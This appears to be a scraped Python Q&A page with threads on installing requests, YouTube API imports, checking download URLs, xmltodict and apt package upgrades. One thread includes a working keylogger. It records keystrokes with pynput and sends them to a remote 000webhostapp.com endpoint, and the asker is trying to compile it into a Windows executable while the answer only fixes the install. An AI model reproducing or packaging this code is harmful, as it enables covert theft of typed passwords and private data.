I am looking to alter the following code so as t run it on python2.x and beautifulsoup3.x
import requests
import BeautifulSoup
session = requests.session()
pages = []
req = session.get('webpage')
content = req.content.split("</html>")
for page in content[:-1]:
doc = BeautifulSoup.BeautifulSoup(page)
name = doc.find('table', id='table2').find('table').findAll('td')[3].text
print name
tables = doc.findAll('table', id="conn")
target_table = None
for table in tables:
try:
title = table.find('thead').find('td').text
except:
title = None
if title == 'ESME DETAILS':
target_table = table
break
if target_table:
esme_trs = target_table.find('tbody').findAll('tr')
for tr in esme_trs:
print "\t", tr.find('td').text
The problem is that requests is not installed in the python2.X installation, only for python3.X
requests isn't standard library so it doesnt't come installed with python, so you need to install it manually.
See the instructions are on the requests website for how to install it.
When setting up requests, either set your default Python installation to your Py2.x or install requests via the source code and instead of just running python setup.py install rather run /path/to/python2.x setup.py install to have it install to your 2.x instance.
Related
When I convert this code with pyinstaller and run it as a exe in a window 10 vm it printed this error.
import pynput
import requests
import json
key_count = 0
keys = []
def on_press(key):
global key_count
global keys
keys.append(str(key))
key_count += 1
if key_count >= 10:
key_count = 0
send_keys()
def send_keys():
data = json.dumps({'key_data': ''.join(keys)})
headers = {'Content-type': 'application/json'}
keys.clear()
url = 'https://000webhostapp.com/dog.php'
try:
response = requests.post(url, data=data, headers=headers)
response.raise_for_status()
except requests.exceptions.RequestException as e:
print(f'Error: {e}')
else:
print('Data sent successfully')
with pynput.keyboard.Listener(on_press=on_press) as listener:
listener.join()
enter image description here
Need help Thank you in advance
I try to force to convert the python code with command to include the module but didnt work I dont know what to do.
Thank you
as far as I see from what you said, you are not using any virtualenv. You installed python directly on your computer and started using the script.
The Requests library is not one of the libraries that come with python by default.
To install;
python -m pip install requests
"What is virtualenv and how to use it?" To find an answer to the question with the example of the requests library;
https://docs.python-guide.org/dev/virtualenvs/
I already tried your command but it does the same error. I used this code to convert the .py
pyinstaller --onefile your_script_name.py
Thank you :)
I am following the tutorial found here https://www.geeksforgeeks.org/youtube-data-api-set-1/. After I run the below code, I am getting a "No module named 'apiclient'" error. I also tried using "from googleapiclient import discovery" but that gave an error as well. Does anyone have alternatives I can try out?
I have already imported pip install --upgrade google-api-python-client
Would appreciate any help/suggestions!
Here is the code:
from apiclient.discovery import build
# Arguments that need to passed to the build function
DEVELOPER_KEY = "your_API_Key"
YOUTUBE_API_SERVICE_NAME = "youtube"
YOUTUBE_API_VERSION = "v3"
# creating Youtube Resource Object
youtube_object = build(YOUTUBE_API_SERVICE_NAME, YOUTUBE_API_VERSION,
developerKey = DEVELOPER_KEY)
def youtube_search_keyword(query, max_results):
# calling the search.list method to
# retrieve youtube search results
search_keyword = youtube_object.search().list(q = query, part = "id, snippet",
maxResults = max_results).execute()
# extracting the results from search response
results = search_keyword.get("items", [])
# empty list to store video,
# channel, playlist metadata
videos = []
playlists = []
channels = []
# extracting required info from each result object
for result in results:
# video result object
if result['id']['kind'] == "youtube# video":
videos.append("% s (% s) (% s) (% s)" % (result["snippet"]["title"],
result["id"]["videoId"], result['snippet']['description'],
result['snippet']['thumbnails']['default']['url']))
# playlist result object
elif result['id']['kind'] == "youtube# playlist":
playlists.append("% s (% s) (% s) (% s)" % (result["snippet"]["title"],
result["id"]["playlistId"],
result['snippet']['description'],
result['snippet']['thumbnails']['default']['url']))
# channel result object
elif result['id']['kind'] == "youtube# channel":
channels.append("% s (% s) (% s) (% s)" % (result["snippet"]["title"],
result["id"]["channelId"],
result['snippet']['description'],
result['snippet']['thumbnails']['default']['url']))
print("Videos:\n", "\n".join(videos), "\n")
print("Channels:\n", "\n".join(channels), "\n")
print("Playlists:\n", "\n".join(playlists), "\n")
if __name__ == "__main__":
youtube_search_keyword('Geeksforgeeks', max_results = 10)
With this information it's hard to say what is the problem. But sometimes I've been banging my head to wall when installing something with pip (Python2) and then trying to import module in Python3 or vice versa.
So if you are running your script with Python3, try install package by using pip3 install --upgrade google-api-python-client
Try the YouTube docs here:
https://developers.google.com/youtube/v3/code_samples
They worked for me on a recently updated Slackware_64 14.2
I use them with Python 3.8. Since there may also be a version 2 of Python installed, I make sure to use this in the Interpreter line:
!/usr/bin/python3.8
Likewise with pip, I use pip3.8 to install dependencies
I installed Python from source. python3.8 --version Python 3.8.2
You can also look at this video here:
https://www.youtube.com/watch?v=qDWtB2q_09g
It sort of explains how to use YouTube's API explorer. You can copy code samples directly from there. The video above covers Android, but the same concept applies to Python regarding using YouTube's API Explorer.
I concur with the previous answer regarding version control.
Im currently using the following code to download gz file. The url of the gz file will be constructed from pieces of information provided by the user:
generalUrl = theWebsiteURL + "/" + packageName
So generalURl can contain something like: http://www.example.com/blah-0.1.0.tar.gz
res = requests.get(generalUrl)
res.raise_for_status()
The problem I have here is; I have a list of websites for the variable called theWebsiteURL. I need to check all of these websites to see which ones have the package in packageName available for download. I would prefer not to download the package during the confirmation.
Once the code goes through the list of websites to discover which ones have the package, I then want to pick the first website from the list of websites that were found to have the package and automatically download the package from it.
something like this:
#!/usr/bin/env python2.7
listOfWebsites = [ website1, website2, website3, website4, and so on ]
goodWebsites = []
for eachWebsite in listOfWebsites:
genURL = eachWebsite + "/" + packageName
res = requests.get(genUrl)
res.raise_for_status()
if raise_for_status == "200"
goodWebsites.append(genURL)
This is where my imagination stops. I need assistance completing this. Not even sure I'm going about it the right way.
You can try to send a HEAD request first in order to check that the URL is valid, and only then download the package via a GET request.
#!/usr/bin/env python2.7
listOfWebsites = [ website1, website2, website3, website4, and so on ]
goodWebsites = []
for eachWebsite in listOfWebsites:
genURL = eachWebsite + "/" + packageName
res = requests.head(genUrl)
if res.ok:
goodWebsites.append(genURL)
I'm trying in python2.7 with xmltodict ext. get data from app engine API (XML type).
Got no idea of how doing that...
I tried to do so with local XML (I download it from source url) with success
my local code look like this:
import xmltodict
document = open("my local path\API_GETDATA.xml", "r")
read_doc = document.read()
xml_doc = xmltodict.parse(read_doc)
for i in xml_doc:
print (xml_doc[i])
i=i+1
and my result is printing all XML fields.
How can I make it work on url? Is there any other thing I miss?
Use the python library requests:
Install with pip install requests and use like this:
import requests
r = requests.get("url")
xmltodict.parse(r.content)
I've been using a combination of apt_pkg and apt libraries to obtain the following details from each package:
package.name
package.installedVersion
package.description
package.homepage
package.priority
I was able to obtain what I needed in the following manner, which I'm not entirely sure it's the best method of obtaining the results:
import apt_pkg, apt
apt_pkg.InitConfig()
apt_pkg.InitSystem()
aptpkg_cache = apt_pkg.GetCache() #Low level
apt_cache = apt.Cache() #High level
apt_cache.update()
apt_cache.open()
pkgs = {}
list_pkgs = []
for package in aptpkg_cache.Packages:
try:
#I use this to pass in the pkg name from the apt_pkg.packages
#to the high level apt_cache which allows me to obtain the
#details I need. Is it better to just stick to one library here?
#In other words, can I obtain this with just apt_pkg instead of using apt?
selected_package = apt_cache[package.name]
#Verify that the package can be upgraded
if check_pkg_status(package) == "upgradable":
pkgs["name"] = selected_package.name
pkgs["version"] = selected_package.installedVersion
pkgs["desc"] = selected_package.description
pkgs["homepage"] = selected_package.homepage
pkgs["severity"] = selected_package.prority
list_pkgs.append(pkgs)
else:
print "Package: " + package.name + " does not exist"
pass #Not upgradable?
except:
pass #This is one of the main reasons why I want to try a different method.
#I'm using this Try/Catch because there are a lot of times that when
#I pass in package.name to apt_cache[], I get error that package does not
#exists...
def check_pkg_status(package):
versions = package.VersionList
version = versions[0]
for other_version in versions:
if apt_pkg.VersionCompare(version.VerStr, other_version.VerStr)<0:
version = other_version
if package.CurrentVer:
current = package.CurrentVer
if apt_pkg.VersionCompare(current.VerStr, version.VerStr)<0:
return "upgradable"
else:
return "current"
else:
return "uninstalled"
I want to find a good way of using apt_pkg/apt to get the details for each package that's a possible upgrade/update candidate?
The way I'm currently doing this, I only get updates/upgrades for packages already in the system, even though I noticed the update manager for Debian shows me packages that I don't have in my system.
The following script is based on your python code, works on my Ubuntu 12.04, should also works with any system has python-apt 0.8+
import apt
apt_cache = apt.Cache() #High level
apt_cache.update()
apt_cache.open()
list_pkgs = []
for package_name in apt_cache.keys():
selected_package = apt_cache[package_name]
#Verify that the package can be upgraded
if selected_package.isUpgradable:
pkg = dict(
name=selected_package.name,
version= selected_package.installedVersion,
desc= selected_package.description,
homepage= selected_package.homepage,
severity= selected_package.priority)
list_pkgs.append(pkg)
print list_pkgs